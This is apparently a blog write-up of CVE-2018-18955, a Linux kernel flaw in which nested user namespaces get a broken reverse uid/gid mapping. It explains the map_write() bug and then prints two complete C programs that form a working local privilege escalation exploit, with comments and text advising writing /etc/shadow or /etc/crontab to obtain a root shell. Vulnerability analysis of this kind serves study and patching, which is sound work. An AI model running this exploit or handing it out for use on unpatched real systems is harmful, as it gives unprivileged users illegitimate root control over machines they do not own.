CVE-2018-18955 - A Handy LPE for Newer Linux Kernels

banner

theres no posts about this cve as far as i know, and the original advisory is just too difficult for newbies like me, so..

warm up

whats user namespace

lets assume you use linux, man user_namespaces will give you what you need

in case you aint familiar with linux namespaces, man namespaces says:

Namespace   Constant          Isolates
Cgroup      CLONE_NEWCGROUP   Cgroup root directory
IPC         CLONE_NEWIPC      System V IPC, POSIX message queues
Network     CLONE_NEWNET      Network devices, stacks, ports, etc.
Mount       CLONE_NEWNS       Mount points
PID         CLONE_NEWPID      Process IDs
User        CLONE_NEWUSER     User and group IDs
UTS         CLONE_NEWUTS      Hostname and NIS domain name

in particular, user namespaces:

User namespaces isolate security-related identifiers and attributes, in particular, user IDs and group IDs (see credentials(7)), the root directory, keys (see keyrings(7)), and capabilities (see capabili‐ ties(7)). A process's user and group IDs can be different inside and outside a user namespace. In par‐ ticular, a process can have a normal unprivileged user ID outside a user namespace while at the same time having a user ID of 0 inside the namespace; in other words, the process has full privileges for opera‐ tions inside the user namespace, but is unprivileged for operations outside the namespace.

in CVE-2018-18955 (im gonna call it the cve), nested user namespace is used, heres some info about nested user ns:

User namespaces can be nested; that is, each user namespace—except the initial ("root") namespace— has a parent user namespace, and can have zero or more child user namespaces. The parent user namespace is the user namespace of the process that creates the user namespace via a call to unshare(2) or clone(2) with the CLONE_NEWUSER flag.

and whats uid/gid mapping

the cve uses broken uid/gid mapping to achieve privilege escalation (LPE), so first we have to get a basic understanding about id mapping

from man newuidmap, we get this:

uid
    Beginning of the range of UIDs inside the user namespace.

loweruid
    Beginning of the range of UIDs outside the user namespace.

count
    Length of the ranges (both inside and outside the user namespace).

for loweruid, theres a file /etc/subuid, which sets limit for loweruid:

newuidmap verifies that the caller is the owner of the process indicated by pid and that for each of the above sets, each of the UIDs in the range [loweruid, loweruid+count] is allowed to the caller according to /etc/subuid before setting /proc/[pid]/uid_map

for me, its like:

jm33 subuid

i can create some uid mapping like 0 100000 1000

analysis of cve-2018-18955

the culprit

from the original advisory, we know that its 6397fac4915a causing the cve, so we check it out:

git check out

heres the fix:

fix

find the coresponding source file, kernel/user_namespace.c

locate map_write(), see what it does:

in the first loop, insert_extent() inserts every extent of a mapping array into new_map, who has the type struct uid_gid_map

uidgidmap

the term extent represents one id mapping, when a mapping array has more than one mappings. heres an example with 6 extents

insert extent

then new_map uses sort_idmaps() to sort its two arrays of mappings (new_map->forward, new_map->reverse)

sort_idmaps

UID_GID_MAP_MAX_BASE_EXTENTS is 5, you can find it in the struct uid_gid_map screenshot.

when count of extents (map->nrextents) exceeds 5, sort_idmaps() sorts both arrays, for bsearch() later

the two arrays represents two directions of id mapping, as the original advisory says:

binary search over a sorted array of struct uid_gid_extent is used. Because ID mappings are queried in both directions (kernel ID to namespaced ID and namespaced ID to kernel ID), two copies of the array are created, one per direction, and they are sorted differently.

after sorting, every extent of new_map gets into the second loop

second loop

map_id_range_down() does the following

map_id_range_down_max

lower_first (starting id of parent ns) of the new_map (will be our nested ns later) is replaced with the lower_first id of parent_map in this loop, which means, the lower_first id is mapped to the kernel ns

after map_id_range_down(), new_map->forward array has replaced its lower_first with new ones, but the new_map->reverse array remains untouched

lets rethink what map_write() does

map_write

given the id mapping of parent ns, and the map to write to, map_write() inserts each extent into the new_map, and sorts both of its two arrays, then maps the lower_first from new_map->forward to kernel, while new_map->reverse array is untouched. in this process, parent_map provides a way up to the kernel, via lower_first

the reverse mapping, which maps kernel ids to the ns, remains the same thing that sort_idmaps() produces

yes, new_map->reverse is generated by sort_idmaps() in the following way:

the reverse mapping

its a copy of the forward array, just a different sorting

as the sorting happens before the "mapping to kernel" loop, the reverse mapping is acutally not processed, then map_write() installs the new map anyways, as a result, we have broken id mapping in the new ns, where the kernel to ns mapping is acutally the unprocessed reversing of the ns to kernel (forward) mapping.

say if we have a uid range of 0..1000, as the initial mapping to install, according to the analysis above, we will eventually get 0..1000 as our kernel to ns uid mapping, thus, something unexpected is about to happen

leverage the broken id mapping

according to the author of CVE-2018-18955 (jannh@google.com), from_kuid() is used in kuid_has_mapping(), which in turn is used by some capability checking functions such as inode_owner_or_capable() and privileged_wrt_inode_uidgid().

thats where LPE comes in, from_kuid() gives incorrect ids, resulting a incorrect capability checking, which allows attacker to gain write access to inodes they are not supposed to write

i have a bunch of screenshots to visualize this process

prv wrt inode

kuid_has_mapping

using map reverse

finally, we are searching in map->reverse, which is broken from the very begining (when its been written)

proof of concept

you can just check the original advisory for PoC

heres my screenshot showing how it works

cve-2018-18955-poc

since you can write /etc/shadow, why not just write some cron job to /etc/crontab and be root?

thanks for reading such an boring post, i am gonna show you something more boring, with comments:

subuid_shell.c

#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <grp.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
    int sync_pipe[2];
    char dummy;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe))
        err(1, "pipe");

    pid_t child = fork();
    if (child == -1)
        err(1, "fork");
    if (child == 0) {
        // kill child if parent dies
        prctl(PR_SET_PDEATHSIG, SIGKILL);
        close(sync_pipe[1]);

        // create new ns
        if (unshare(CLONE_NEWUSER))
            err(1, "unshare userns");

        if (write(sync_pipe[0], "X", 1) != 1)
            err(1, "write to sock");
        if (read(sync_pipe[0], &dummy, 1) != 1)
            err(1, "read from sock");

        // set uid and gid to 0, in child ns
        if (setgid(0))
            err(1, "setgid");
        if (setuid(0))
            err(1, "setuid");

        // replace process with bash shell, in which you will see "root",
        // as the setuid(0) call worked
        // this might seem a little confusing, but you are "root" only to this child ns,
        // thus, no permission to the outside ns
        execl("/bin/bash", "bash", NULL);
        err(1, "exec");
    }

    close(sync_pipe[0]);
    if (read(sync_pipe[1], &dummy, 1) != 1)
        err(1, "read from sock");

    // set id mapping (0..1000) for child process
    char cmd[1000];
    sprintf(cmd, "echo deny > /proc/%d/setgroups", (int)child);
    if (system(cmd))
        errx(1, "denying setgroups failed");
    sprintf(cmd, "newuidmap %d 0 100000 1000", (int)child);
    if (system(cmd))
        errx(1, "newuidmap failed");
    sprintf(cmd, "newgidmap %d 0 100000 1000", (int)child);
    if (system(cmd))
        errx(1, "newgidmap failed");

    if (write(sync_pipe[1], "X", 1) != 1)
        err(1, "write to sock");

    int status;
    if (wait(&status) != child)
        err(1, "wait");
    return 0;
}

subshell.c

#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <grp.h>
#include <sched.h>
#include <stdio.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
    int sync_pipe[2];
    char dummy;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe))
        err(1, "pipe");

    // create a child process
    pid_t child = fork();
    if (child == -1)
        err(1, "fork");
    if (child == 0) {
        // in child process
        close(sync_pipe[1]);

        // this creates a new ns
        if (unshare(CLONE_NEWUSER))
            err(1, "unshare userns");
        if (write(sync_pipe[0], "X", 1) != 1)
            err(1, "write to sock");

        if (read(sync_pipe[0], &dummy, 1) != 1)
            err(1, "read from sock");

        // start a bash process (replace process image)
        // this time you are actually root, without the name/id, though
        // technically the root access is not complete,
        // to get complete root, write to /etc/crontab and wait for a root shell to pop up
        execl("/bin/bash", "bash", NULL);
        err(1, "exec");
    }

    close(sync_pipe[0]);
    if (read(sync_pipe[1], &dummy, 1) != 1)
        err(1, "read from sock");

    char pbuf[100]; // path of uid_map
    sprintf(pbuf, "/proc/%d", (int)child);

    // cd to /proc/pid/uid_map
    if (chdir(pbuf))
        err(1, "chdir");

    // our new id mapping with 6 extents (> 5 extents)
    const char* id_mapping = "0 0 1\n1 1 1\n2 2 1\n3 3 1\n4 4 1\n5 5 995\n";

    // write the new mapping to uid_map and gid_map
    int uid_map = open("uid_map", O_WRONLY);
    if (uid_map == -1)
        err(1, "open uid map");
    if (write(uid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping))
        err(1, "write uid map");
    close(uid_map);
    int gid_map = open("gid_map", O_WRONLY);
    if (gid_map == -1)
        err(1, "open gid map");
    if (write(gid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping))
        err(1, "write gid map");
    close(gid_map);
    if (write(sync_pipe[1], "X", 1) != 1)
        err(1, "write to sock");

    int status;
    if (wait(&status) != child)
        err(1, "wait");
    return 0;
}

jm33_ng